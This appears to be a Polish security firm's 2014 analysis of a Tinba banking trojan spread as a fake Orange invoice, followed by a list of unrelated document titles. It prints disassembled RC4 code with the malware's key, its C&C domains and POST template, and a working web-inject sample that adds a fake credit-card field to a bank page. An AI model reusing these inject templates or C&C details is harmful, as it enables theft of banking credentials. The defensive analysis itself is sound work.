Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA

Wielkość: px
Rozpocząć pokaz od strony:

Download "Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA"

Transkrypt

1 Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA 21 Lipiec, 2014 W dniu 11 lipca 2014 zarejestrowaliśmy kolejną kampanię polegającą na rozsyłaniu złośliwego oprogramowania nakierowanego na bankowość internetową. Tym raz atak skierowany jest na polskich użytkowników. Jak można zauważyć poniżej, treść wiadomości jest w języku polskim i dotyczy faktury z Telekomunikacji Polskiej za czerwiec Były też rozsyłane wiadomości o innej treści oraz zawierające nieznacznie zmodyfikowaną wersję złośliwego oprogramowania. Łatwo zauważyć (dla osób które co miesiąc otrzymują faktury z firmy Orange), że nie jest to typowa wiadomość z fakturą. Dla bardziej spostrzegawczych: Firma Orange do grudnia 2013 wykorzystywała adres ale od stycznia 2014 już Niemniej złośliwe oprogramowanie dołączone jest do wiadomości. Treść wiadomości i nazwa załącznika sugerują, że jest to dokument w formacie PDF. W rzeczywistości jest to plik wykonywalny o rozszerzeniu pif. File: DKT_Faktura_indywidualna_2014_07_11_R.pdf.pif Size: MD5: DA9330AA6D275BA28954B88ECF27DEDB Plik wykonywalny jest dodatkowo zabezpieczony, przez co ujawniana jest niewielka ilość ciągów znaków prawdziwego pliku wykonywalnego. Prevenity

2 Po uruchomieniu kod programu pakującego sprawdza, czy przypadkiem nie jest uruchamiany pod systemem operacyjnym kontrolowanym przez oprogramowanie VMWare lub VBOX oraz czy nie jest analizowany przez inny system typu sandbox bazujący na bibliotece SBIEDLL.DLL (np. Sandboxie). Poniżej fragment pamięci malware. Złośliwe oprogramowanie za pomocą API CreateToolhelp32Snapshot, Process32First oraz Process32Next identyfikuje podejrzane procesy i malware kończy działanie. Zauważyliśmy ponadto, że złośliwe oprogramowanie nie działa prawidło na systemach operacyjnych Windows XP z SP1 oraz SP3 (nie wywołuje prawidłowo funkcji API RegOpenKey). Gdy wirtualne środowisko nie zostanie wykryte, malware tworzy nowy proces, kopiuje do przestrzeni adresowej odpakowany kod i wykonuje właściwy kod odpowiedzialny za infekcję stacji roboczej. Sekwencja wywołań API jest następująca (typowa dla złośliwego oprogramowania): GetModuleFileNameW, 0x1, hprocess:0x774 CreateProcessW, 0x1, lpapplicationname: ReadProcessMemory, 0x1, hprocess:0x774 WriteProcessMemory, 0x1, hprocess:0x774 GetThreadContext, 0x1 SetThreadContext, 0x1, lpcontext->eip:0x40487c ResumeThread, 0x1, hthread:0x770 Stary proces kończy działanie a nowy zaczyna od wywołania funkcji Sleep. Następnie pobierana jest zmienna %APPDATA% i w katalogu domowym użytkownika tworzony jest katalog AdobeChk a w nim plik chk.exe. Jest to kopia pliku pif..text:00401ee1 call dword ptr [ebx h] ; funkcja CreateDirectory -> AdobeChk.text:00401EE7 push 1.text:00401EE9 lea eax, [ebp-20ch].text:00401eef push eax ; chk.exe.text:00401ef0 lea eax, dword_4012b4[ebx].text:00401ef6 push eax ; DKT_Faktura_indywidualna_2014_07_11_R.pdf.pif.text:00401EF7 call dword ptr [ebx h] ; funkcja MoveFileExA Następnie tworzony jest klucz rejestru o nazwie AdobeChk. To zapewnia, że malware będzie uruchamiany przy ponownym logowaniu użytkownika. Prevenity

3 Złośliwe oprogramowanie ma zaimplementowany algorytm RC4 (szyfr strumieniowy), który używany jest do szyfrowania/odszyfrowywania fragmentów konfiguracji oraz komunikacji z serwerem C&C. Poniżej fragment kodu odpowiedzialnego za szyfrowanie danych:.text:00401bf2 call eax ; funkcja RC4SetKey.text:00401BF4 mov esi, [ebp+8].text:00401bf7 lodsd.text:00401bf8 push eax ; długość danych do zaszyfrowania.text:00401bf9 push esi ; dane do zaszyfrowania.text:00401bfa lea eax, [ebp-100h].text:00401c00 push eax ; zainicjalizowany klucz.text:00401c01 lea eax, dword_401c64[ebx].text:00401c07 call eax ; funkcja RC4Crypt RC4 generuje strumień szyfrujący/odszyfrowujący za pomocą funkcji RC4SetKey. Jako parametr wejściowy podawany jest tajny klucz, który w przypadku analizowanego malware to: wer8c7ygbw485ghw. Cała zawartość funkcji RC4SetKey (Crypt\rc4.inc): RC4SetKey proc lpkeytable, lppass, npass : dword pushad mov edi, lpkeytable xor ecx, ecx mov [edi + ecx], cl ;utworzenie tablicy liczb inc ecx cmp ecx, 256 ;do 256 elementów mov esi, lppass ;klucz tajny przeniesiony do ESI xor ebx, ebx xor ecx, ecx xor edx, edx mov al, [edi + ecx] add bl, [esi + edx] add bl, al mov ah, [edi + ebx] mov [edi + ecx], ah mov [edi + ebx], al inc ecx cmp ecx, 256 inc edx Prevenity

4 cmp edx, npass xor edx, edx popad ret RC4SetKey endp Następnie wywoływana jest funkcja RC4Crypt. W celu zaszyfrowania wykonywana jest operacja XOR na tekście oryginalnym i strumieniu szyfrującym. Dla przykładu inicjalizująca wiadomość EHLO przesyłana przez malware do serwera po zaszyfrowany będzie miała postać: Poniżej funkcja RC4Crypt odtworzona z malware za pomocą debugger-a:.text:00401c64 push ebp.text:00401c65 mov ebp, esp.text:00401c67 pusha.text:00401c68 mov edi, [ebp+8].text:00401c6b mov esi, [ebp+0ch].text:00401c6e xor eax, eax.text:00401c70 xor ebx, ebx.text:00401c72 xor ecx, ecx.text:00401c74 xor edx, edx.text:00401c76 loc_401c76: ; CODE XREF:.text:00401C91j.text:00401C76 inc bl.text:00401c78 mov dl, [edi+ebx].text:00401c7b add al, dl.text:00401c7d mov cl, [edi+eax].text:00401c80 mov [edi+ebx], cl.text:00401c83 mov [edi+eax], dl.text:00401c86 add cl, dl.text:00401c88 mov cl, [edi+ecx].text:00401c8b xor [esi], cl ; Operacja XOR na tekście i strumieniu szyfrującym.text:00401c8d inc esi.text:00401c8e dec dword ptr [ebp+10h].text:00401c91 jnz short loc_401c76.text:00401c93 popa.text:00401c94 leave.text:00401c95 retn 0Ch Za pomocą samej instrukcji XOR zakodowane są również nazwy domenowe serwerów C&C. Malware próbuje łączyć się na hosty o nazwach: framesoutchk.ru IP: plsecdirect.ru IP: Prevenity

5 Poniżej fragment kodu odkodowującego nazwy domenowe: W chwili wykonywania analizy strona z którą złośliwe oprogramowanie komunikuje się nie była aktywna. Poniżej zawartość szablonu wiadomości POST: POST /re/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Content-Type: application/x-www-form-urlencoded Host: framesoutchk.ru lub plsecdirect.ru Content-Length: Connection: Close Cache-Control: no-cache Wysyłanie komunikatu EHLO zwracało błąd 403. Niemniej na podstawie analizy można stwierdzić, że malware, który był rozsyłany nosi nazwę Tiny Banker (nazywany również Tinba). Jest to złośliwe oprogramowanie, które używane jest do wyłudzania numerów kart kredytowych czy danych do logowania w aplikacjach www jak bankowość internetowa. Na początku lipca 2014 kod źródłowy wersji 1.0 wyciekł do sieci Internet. Poniżej zawartość katalogu z kodem źródłowym: Prevenity

6 Jest to wersja z 2012 roku ale część kodu nie została zmieniona. Na podstawie analizowanej wersji pliku DKT_Faktura_indywidualna_2014_07_11_R.pdf.pif można stwierdzić, że malware infekuje 4 przeglądarki internetowe: iexplore.exe firefox.exe maxthon.exe chrome.exe Przechwytywane są funkcje (metodą inline hooking) dwóch bibliotek: wininet oraz nspr4. Są to następujące funkcje: HttpQueryInfoA InternetCloseHandle HttpSendRequestA HttpSendRequestW InternetQueryDataAvailable InternetReadFile InternetReadFileExA HttpSendRequestExW InternetWriteFile HttpEndRequest PR_Write PR_Read PR_Close Prevenity

7 Tinba pobiera konfigurację z serwera i zapisuje ją w zaszyfrowanych RC4 plikach dat. Poniżej lista wszystkich plików, które może utworzyć malware korzystając ze zmiennej %APPDATA%: bck.dat, ret.exe, cot.dat, cof.dat. Zawartość pliku konfiguracyjnego przypomina budową konfigurację złośliwego oprogramowania ZEUS/ZBOT. Intruz może manipulować zawartością wyświetlanej użytkownikowi strony. Poniżej działający przykład, który wstrzykuje odpowiednio przygotowany kod. set_url GP data_before <input type="submit" value="submit"> data_end data_inject <script type="text/javascript">alert("uwaga prosimy o podanie numeru karty kredytowej");</script> <form name="myform"> Numer karty kredytowej:<input type="text" name="ccnumber"> </form> data_end data_after data_end Źródła: [1] [2] TrendMicro Dokument: W32.Tinba (Tinybanker) The Turkish Incident. Prevenity

PAKIET DLA ADMINISTR ACJI INFORMACJE WYMIAROWE PRZEZ INTERNET

PAKIET DLA ADMINISTR ACJI INFORMACJE WYMIAROWE PRZEZ INTERNET PAKIET DLA ADMINISTR ACJI epodatki INFORMACJE WYMIAROWE PRZEZ INTERNET 2 SPIS TREŚCI Wstęp... 3 Opis funkcjonalny... 3 Wykorzystanie usługi przez podatnika... 3 PayByNet... 4 Wykorzystanie usługi w połączeniu

Bardziej szczegółowo

W skrócie 6. Zawartość CD 8. Atak. Obrona. hakin9

W skrócie 6. Zawartość CD 8. Atak. Obrona. hakin9 hakin9 Witamy! Lato w pełni i mamy nadzieję, że nasi czytelnicy podczas swoich urlopów nie zapomną o nas i zakupią lipcowy numer hakin9 jak się obronić. Gorąco polecamy artykuł z działu atak: Praktyczny

Bardziej szczegółowo

Szkolenie techniczne. Kopalnia wiedzy o rozwiązaniach firmy G Data dla biznesu. Go safe. Go Safer. G Data.

Szkolenie techniczne. Kopalnia wiedzy o rozwiązaniach firmy G Data dla biznesu. Go safe. Go Safer. G Data. Szkolenie techniczne Kopalnia wiedzy o rozwiązaniach firmy G Data dla biznesu Go safe. Go Safer. G Data. -2- Spis treści 1. G Data ClientSecurity Enterprise... 4 1.1. G Data ClientSecurity Business...4

Bardziej szczegółowo

Instrukcja obsługi programu

Instrukcja obsługi programu Instrukcja obsługi programu ArcaVir 2010 Copyright 2004-2010 by ArcaBit Sp. z o.o. Zarówno program, jak i instrukcja korzystają z pełnej ochrony określonej przepisami prawa autorskiego. Wszystkie aktualne

Bardziej szczegółowo

Zespół Szkół im. Adama Wodziczki w Mosinie. Roman Zalewski Mariusz Bocian. Szkodniki komputerowe i zagroŝenia w sieci

Zespół Szkół im. Adama Wodziczki w Mosinie. Roman Zalewski Mariusz Bocian. Szkodniki komputerowe i zagroŝenia w sieci Zespół Szkół im. Adama Wodziczki w Mosinie Roman Zalewski Mariusz Bocian Szkodniki komputerowe i zagroŝenia w sieci Mosina 2005/2006 Praca wykonana podczas zajęć przedmiotu: przetwarzanie informacji w

Bardziej szczegółowo

NOD32 Antivirus 3.0. Podręcznik użytkownika. Zintegrowane komponenty: ESET NOD32 Antivirus ESET NOD32 Antispyware. We protect your digital worlds

NOD32 Antivirus 3.0. Podręcznik użytkownika. Zintegrowane komponenty: ESET NOD32 Antivirus ESET NOD32 Antispyware. We protect your digital worlds NOD32 Antivirus 3.0 Zintegrowane komponenty: ESET NOD32 Antivirus ESET NOD32 Antispyware Podręcznik użytkownika We protect your digital worlds spis treści 1. ESET NOD32 Antivirus 3.0...4 1.1 Nowości...

Bardziej szczegółowo

System plików działający poza jądrem systemu operacyjnego Linux

System plików działający poza jądrem systemu operacyjnego Linux Akademia Górniczo-Hutnicza im. Stanisława Staszica wkrakowie Praca magisterska System plików działający poza jądrem systemu operacyjnego Linux Jan Wróbel Kierunek: Informatyka Specjalność: Systemy rozproszone

Bardziej szczegółowo

Rys. 1. Haker zgaduje inne adresy sieciowe korzystając z adresu IP serwera

Rys. 1. Haker zgaduje inne adresy sieciowe korzystając z adresu IP serwera Najprostszy atak hakerski Jak wiadomo, każdy komputer w sieci ma własny adres IP. Każdy komputer przyłączony do sieci dołącza do każdego transmitowanego pakietu adres IP komputera docelowego oraz unikatową

Bardziej szczegółowo

www.softactivity.com Activity Monitor Podręcznik użytkownika

www.softactivity.com Activity Monitor Podręcznik użytkownika www.softactivity.com Activity Monitor Podręcznik użytkownika Wersja polska: www.sirtom.pl 2013 Spis treści Witamy w programie Activity Monitor... 3 Szybki start... 4 Dodatkowe uwagi odnośnie instalacji:...

Bardziej szczegółowo

Joomla! Zabezpieczanie witryn

Joomla! Zabezpieczanie witryn Joomla! Zabezpieczanie witryn Autor: Tom Canavan T³umaczenie: Roman Gryzowski, Tomasz Walczak ISBN: 978-83-246-2197-2 Tytu³ orygina³u: Joomla! Web Security Format: 170 230, stron: 248 Zabezpiecz stronê

Bardziej szczegółowo

Apache serwer www. oraz programy związne. Maciej Mazur Oleksak Sławomir

Apache serwer www. oraz programy związne. Maciej Mazur Oleksak Sławomir Apache serwer www oraz programy związne Maciej Mazur Oleksak Sławomir WSTĘP... 3 PORÓWNANIE SERWERÓW... 4 SERWER APACHE... 6 KOMPILACJA APACHE... 6 INSTALACJA... 7 URUCHAMIANIE... 8 MODUŁY... 11 CGI...

Bardziej szczegółowo

Kontakt. System Antywirusowy NOD32

Kontakt. System Antywirusowy NOD32 Kontakt Producent: Dystrybutor w Polsce: Eset Software DAGMA Sp. z o.o. 1172 Orange Ave ul. Pszczyńska 15 Coronado 40 478 Katowice, Polska California, 92118 Tel: +48 32 259 11 00 USA Fax: +48 32 259 11

Bardziej szczegółowo

Raport o stanie bezpieczeostwa cyberprzestrzeni RP w 2010 roku

Raport o stanie bezpieczeostwa cyberprzestrzeni RP w 2010 roku Raport o stanie bezpieczeostwa cyberprzestrzeni RP w 2010 roku Warszawa 2011 CERT.GOV.PL CERT.GOV.PL Rządowy Zespół Reagowania na Incydenty Komputerowe CERT.GOV.PL został powołany w dniu 1 lutego 2008

Bardziej szczegółowo

BDG.WZP.311.24.2015.12.BP Warszawa, 23 lipca 2015 r.

BDG.WZP.311.24.2015.12.BP Warszawa, 23 lipca 2015 r. BDG.WZP.311.24.2015.12.BP Warszawa, 23 lipca 2015 r. Wykonawcy Dotyczy: postępowania o udzielenie zamówienia publicznego Dostawa oprogramowania serwerowego i licencji dla stacji roboczych do Ministerstwa

Bardziej szczegółowo

ESET NOD32 ANTIVIRUS 8

ESET NOD32 ANTIVIRUS 8 ESET NOD32 ANTIVIRUS 8 Podręcznik użytkownika (dotyczy programu w wersji 8.0 lub nowszej) Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Kliknij tutaj, aby pobrać najnowszą

Bardziej szczegółowo

ERserver. iseries. Protokół SSL (Secure Sockets Layer)

ERserver. iseries. Protokół SSL (Secure Sockets Layer) ERserver iseries Protokół SSL (Secure Sockets Layer) ERserver iseries Protokół SSL (Secure Sockets Layer) Copyright International Business Machines Corporation 2000, 2002. Wszelkie prawa zastrzeżone.

Bardziej szczegółowo

Rozdział 1: Instalacja...5

Rozdział 1: Instalacja...5 F-Secure Internet Security 2014 F-Secure Internet Security 2014 Spis treści 2 Spis treści Rozdział 1: Instalacja...5 1.1 Przed pierwszą instalacją...6 1.2 Instalowanie produktu po raz pierwszy...7 1.3

Bardziej szczegółowo

AVG Anti-Virus 2012. Podręcznik użytkownika. Wersja dokumentu 2012.20 (3/29/2012)

AVG Anti-Virus 2012. Podręcznik użytkownika. Wersja dokumentu 2012.20 (3/29/2012) AVG Anti-Virus 2012 Podręcznik użytkownika Wersja dokumentu 2012.20 (3/29/2012) Copyright AVG Technologies CZ, s.r.o. Wszelkie prawa zastrzeżone. Wszystkie pozostałe znaki towarowe są własnością ich właścicieli.

Bardziej szczegółowo

MALKOM VPN Client. Instrukcja użytkownika. Wersja dokumentu: 1.4 Data aktualizacji: 2007-03-26. Wersja 3.1.0. Polska wersja językowa

MALKOM VPN Client. Instrukcja użytkownika. Wersja dokumentu: 1.4 Data aktualizacji: 2007-03-26. Wersja 3.1.0. Polska wersja językowa MALKOM VPN Client Wersja 3.1.0 Instrukcja użytkownika Polska wersja językowa Wersja dokumentu: 1.4 Data aktualizacji: 2007-03-26 Strona 1 z 36 Spis treści 1 WPROWADZENIE... 3 2 DOKUMENTY ZWIĄZANE...4 3

Bardziej szczegółowo

Instrukcja obsługi systemu: Korporacyjny i Indywidualny Rachunek Internetowy dla Banków Spółdzielczych. Panel klienta

Instrukcja obsługi systemu: Korporacyjny i Indywidualny Rachunek Internetowy dla Banków Spółdzielczych. Panel klienta Instrukcja obsługi systemu: Korporacyjny i Indywidualny Rachunek Internetowy dla Banków Spółdzielczych Panel klienta Data aktualizacji: 26-03-2013 1 Spis treści 1 Wprowadzenie 5 1.1 Wczytywanie certyfikatu

Bardziej szczegółowo

Narzędzia wspierające zarządzanie siecią komputerową w środowisku Linux. Praca dyplomowa

Narzędzia wspierające zarządzanie siecią komputerową w środowisku Linux. Praca dyplomowa Narzędzia wspierające zarządzanie siecią komputerową w środowisku Linux Praca dyplomowa 1 Spis Treści: Wstęp - strona 4 Rozdział I System Linux - strona 6 1.1 Wybór dystrybucji systemu. - strona 6 1.2

Bardziej szczegółowo

Podręcznik użytkownika

Podręcznik użytkownika Ferro Backup System SIECIOWY SYSTEM ARCHIWIZACJI DANYCH dla stacji roboczych, laptopów i serwerów Podręcznik użytkownika wersja 4.3 FERRO Software www.ferro.com.pl Październik, 2013 Copyright 2000-2013

Bardziej szczegółowo

Instrukcja obsługi systemu: Korporacyjny i Indywidualny Rachunek Internetowy dla Banków Spółdzielczych. Instrukcja dla klienta

Instrukcja obsługi systemu: Korporacyjny i Indywidualny Rachunek Internetowy dla Banków Spółdzielczych. Instrukcja dla klienta Instrukcja obsługi systemu: Korporacyjny i Indywidualny Rachunek Internetowy dla Banków Spółdzielczych Instrukcja dla klienta Data aktualizacji: 28-01-2013 1 Spis treści 1 Podstawowe zasady bezpiecznego

Bardziej szczegółowo

Instrukcja użytkownika. Lipiec 2013. Q - Table. Just dream IT, we do the rest.

Instrukcja użytkownika. Lipiec 2013. Q - Table. Just dream IT, we do the rest. Instrukcja użytkownika Q - Table Lipiec 2013 Program Q-Table służy do połączenia z bazą danych systemu SAP ERP. Umożliwia pobranie tabel i zapisanie ich na lokalnym dysku lub w bazie danych. Przed ściągnięciem

Bardziej szczegółowo

System Symfonia e-dokumenty

System Symfonia e-dokumenty System Symfonia e-dokumenty Podręcznik użytkownika Wersja 2012 Windows jest znakiem towarowym firmy Microsoft Corporation. Adobe, Acrobat, Acrobat Reader, Acrobat Distiller są zastrzeżonymi znakami towarowymi

Bardziej szczegółowo

ESET ENDPOINT SECURITY

ESET ENDPOINT SECURITY ESET ENDPOINT SECURITY Podręcznik użytkownika Microsoft Windows 7 / Vista / XP / 2000 / Home Server / 2003 / 2008 Kliknij tutaj, aby pobrać najnowszą wersję tego dokumentu ESET ENDPOINT SECURITY Copyright

Bardziej szczegółowo

Opis przedmiotu zamówienia

Opis przedmiotu zamówienia Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich Załącznik nr 2 do ogłoszenia Opis przedmiotu zamówienia Przedmiot zamówienia Dostawa licencji oprogramowania antywirusowego ESET ENDPOINT ANTIVIRUS

Bardziej szczegółowo

dla Państwowej Wyższej Szkoły Zawodowej w Elblągu o parametrach nie gorszych niż:

dla Państwowej Wyższej Szkoły Zawodowej w Elblągu o parametrach nie gorszych niż: ZAŁĄCZNIK NR 2 OPIS PRZEDMIOTU ZAMÓWIENIA w postępowaniu o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na: Dostawę sprzętu komputerowego i oprogramowania dla Państwowej Wyższej

Bardziej szczegółowo

Rodzaje wirusów komputerowych - Pharming - Wirus makro - Wirus pocztowy - Polimorficzny - Koń trojański - Wirus Boot sector - Dialer 29.03.

Rodzaje wirusów komputerowych - Pharming - Wirus makro - Wirus pocztowy - Polimorficzny - Koń trojański - Wirus Boot sector - Dialer 29.03. 29.03.2015 Temat. Wirusy komputerowe. Jak działają i co powodują. Temat. Programy antywirusowe i rodzaje programów antywirusowych. Wirus komputerowy - to program komputerowy posiadający zdolność replikacji

Bardziej szczegółowo

Przewodnik administratora

Przewodnik administratora Przewodnik administratora NPD 4956-00 PL Spis treści Spis treści Prawa autorskie i znaki towarowe Informacje o instrukcji Oznaczenia i symbole... 5 Elementy graficzne...5 Informacje dotyczące systemu operacyjnego.......

Bardziej szczegółowo